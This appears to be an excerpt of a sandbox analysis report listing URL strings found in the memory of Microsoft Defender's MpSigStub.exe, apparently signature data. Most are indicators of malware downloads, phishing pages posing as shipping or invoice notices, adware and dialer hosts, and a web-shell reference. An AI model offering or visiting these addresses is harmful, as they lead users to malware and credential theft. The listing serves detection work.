Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://chilai.com/system/libraries/tep.txt
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://chistepordia.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://chiuwes.com//kemu.exe
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://chnfsub2manglobalsndy2businessexytwo.duckdns.org/office/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://chu.pe/6xo
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://chutkiraani.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://chuyenquanaotreem.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://cicahroti.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://citw-vol2.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://cjrajan.pw/2/3/4/invoice.docx
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://ckpetchem.com
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://cl.1ck.me/
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://clarityupstate.com/b.ocx
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://claus-wieben.de/sdor1om4hl5naz
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://clean-pelican.cloudvent.net/dxdae.html)
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://clean.systemerrorfixer.com/MTg1MzE=/2/
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://cleanwebsearch.com/?q=
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp String found in binary or memory: http://client.aldtop.com
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://client.myadultexplorer.com/bundle_report.cgi?v=10&campaignID=%s&message=%s
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://clientportal.download/123.php
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://clientportal.download/div.php
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://clients.lb1networks.com/upd.php?
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://cloud-search.linkury.com
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://club.book.sina.com.cn/booksearch/booksearch.php?kw=%s
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://cn%d.evasi0n.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://cns.3721.com/cns.dll?
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://cns.3721.com/cns.dll?xC
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://coastervilleregalos.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://cock4worship.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://coconut-pete.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://code.google.com/p/b374k-shell
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://coltaddict.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://comfirm001.site.bz/hl/dhl%20zip/dhl/dhl%20_%20tracking.htm
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://community.derbiz.com/
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp String found in binary or memory: http://companieshouseonlinedownload.com/ox9.png
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://company.superweb.ws/view/note.exe
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://companyprivatedocumentservershub100000.braddocksrentals.com/commondocs/)
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://config.juezhao123.com/c.ashx?ver=&c=
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://connect.act-sat-bootcamp.com/dana/home.php
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://construtoramistral.com.br/
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://contentedmerc.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp String found in binary or memory: http://continuetosave.info/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://coolwalpaper.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://cooperjcw.xyz/bjsdke.exe
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://coppolarestaurant.com/cgi/resume2.php?id=
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://costacars.es/ico/ortodox.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://count.e-jok.cn/count.txt
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://count.key5188.com/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://count.key5188.com/vip/get.asp?mac=
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://countdutycall.info/1/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://countexchange.com/config/line.gif
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://countrtds.ru/tdstrf/index.php
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://cpanel.asimsrl.com/ifk/cat.php
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://cpr-foundation.org/library/reportdhlnew.php
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://cpr-foundation.org/reportmaersknew.php
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: http://cprvstd4upcomingtalentanimationauditnyc.duckdns.org/receipt/invoice_112229.doc
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://cpvfeed.mediatraffic.com/feed.php?ac=%s&kw=%s&url=%s&ip=%s&rfo=xml
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://cr-installer-fallback.s3-us-west-2.amazonaws.com/spd/shopp/sense9.exe_a
Source: WerFault.exe, 00000009.00000002.3011223832.000000000635B000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://crl.defence.gov.au/pki0
Source: WerFault.exe, 00000009.00000002.3011223832.000000000635B000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://crocus93.grey.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://crxupdate.pw/Crxx/background.js
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://crxupdate.pw/Crxx/flash.xpi
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://cs-skiluj.sanfre.eu/vmjz848148/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://cs.zhongsou.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://cscentralcard.com.br/colors/coffee/report-sfexpress.php
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp String found in binary or memory: http://csgo-run.xyz/dl.exe
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://csjksco.com/initial/)
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://cts.hotbar.com/
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://cts.hotbar.com/trackedevent.aspx
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://cupid.556677889900.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://cvcviagens.sslblindado.com/documento.rtf
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://cvfanatic.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://cxdlk.esy.es/iej3d1/)
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://d.20apoaf.com/xuiow/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://d.ackng.com/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://d.gameplaylabs.com/ce9237be57719933386c8a88b67bf7a5/install.xml?pid=
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://d.robints.us/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://d.sogou.com/music.so?query=%s
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://d.xmapps.net/i.php
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://d1.downxia.net/products/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://d2.3dprotect.net:90/update/?id=%d
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://d2hrpnfyb3wv3k.cloudfront.net
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp String found in binary or memory: http://d2xpmajse0mo96.cloudfront.net/app/ver/ssl.php
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://d4uk.7h4uk.com/w_case/login.php
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp String found in binary or memory: http://dafshare-org.eu.paccar.com
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://dailypictur.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp String found in binary or memory: http://data.webwatcherdata.com/v51/ClientService.asmxx
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: http://data1.yoou8.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://dataoffice.zapto.org
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://dating2u.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingaction.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingbank.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingexplorer.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingfavorite.com
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingfavorite.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingfirst.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datinggallery.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datinggate.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingleader.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingmachine.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingvirtual.net
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://dec.ip3366.net/api/?key=20171119174239256&getnum=99999&proxytype=0
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://default.home
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://defaultincoming.mangospot.net/prf/reg.dot
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://delta-akb.ru/image/data/goods/dtm/.../log.php?f=404
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://deluvis.net/
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://demo.sabkura.com/overdue-payment/
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://designte.com/shop?abc=cgdpzd04jni9oc4y
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://detayworx.com/_vsnpNgyXp84Os8Xh.php
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp String found in binary or memory: http://dev.northzone.it/ds/2312.gif
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://devee.emlnk.com/lt.php?s=b7abe8a8120881cc5c9dab6eac28ddbe&amp;i=1a3a1a
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://device-update.ddns.net
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://device-update.ddns.net-oupdate.exe
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://dgdsgweewtew545435.tk
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://dhm-mhn.com/htamandela.hta
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://dialers.netcollex.net/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://dialin.bunm.de/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://dialin.comonline.net/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://dialin.dnibv.com/
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?x
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/dialup.pl
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl/install/
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl/install/cf
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://dimas.stifar.ac.id/vjrzzufsu/
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp String found in binary or memory: http://dintandnesin.ru/april/view.php?id=
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp String found in binary or memory: http://directplugin.com/dialers/
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp String found in binary or memory: http://directplugin.com/dialers/x
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://discoverberts.com.au/dav//assets/checkapp1.php
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://disk.karel
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://disk.karelia.pro/2adftYz/392.png
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://dist.checkin100.com/command?projectID=%s&affiliateID=%s&campaignID=%s&application=%s&v=9
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://diydaddy.us/cgi-bin/8f_i
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp String found in binary or memory: http://dl.%s/get/?pin=%s&lnd=%s
Source: MpSigStub.exe, 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp String found in binary or memory: http://dl.360safe.com/gf/360ini.cab
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://dl.dqwjnewkwefewamail.com/
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://dl.dropbox.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://dl.dropbox.com/u/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_a
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_ax
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://dl.pipi.cn/pipi_dae_
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://dl.river-store.com
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://dl.static.iqiyi.com/hz/IQIYIsetup_senxing
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://dl.wizzuniquify.com/download/1/wizzuninstallmodule.exe
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exe
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exex
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/dotnetfx
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: http://dld.rewinup.com/dotnetfx
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://dmww.dmcast.com/script/update.asp?version=%s
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://dmzeventsbali.com/images/usps/usps/label.htm
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://dns.cyberium.cc/script/
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://do.crionn.com/ola.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://docs.atu.ngr.mybluehost.me/
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://docs.atu.ngr.mybluehost.me/presentation.dllregsvr32
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://doctor-antivirus.com/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://doctor-antivirus.com/presalepage/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://doctorantivirus2008a.com/support.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://dokument-9827323724423823.ru/KYSTBANEN.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://dokument-9827323724423823.ru/Telefoncomputernes9.exe
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://domainserver.co.kr
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://down.admin7a57a5a743894a0e.club/4.exe
Source: MpSigStub.exe, 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp String found in binary or memory: http://down.anhuiry.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://down.emoney.cn/wl
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://down.firmsoar.com/Fastaide_1160.exe
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://down.kuwo.cn/mbox/kuwo_jm634.exe
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://down.namepics.info/install.php?name=
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://down2.uc.cn/pcbrowser/down.php?pid=4396
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://download-n-save.com
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://download-the-files.com/tplc/cdc
Source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp String found in binary or memory: http://download.%s.com/124.php?&advid=00000
Source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp String found in binary or memory: http://download.%s.com/madownload.php?&advid=00000000&u=%u&p=%u&lang=______
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://download.3721.com/download/CnsMinExM.ini
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://download.3721.com/download/CnsMinUp
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://download.contextplus.net/shared/Msvcp60Installer.exe
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://download.cpudln.com
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://download.driverupdate.net/DriverUpdate-setup.msi.bz2x
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://download.enativ.com/nativ_v4.exe
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://download.enet.com.cn/search.php?keyword=%s
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://download.kaobeitu.com/kaobeitu/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://download.phpnuke.org/installers/extra_software/coupish/coupish-x
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://download.powercreator
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://download.seznam.cz/update
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://download.softobase.com/ru/
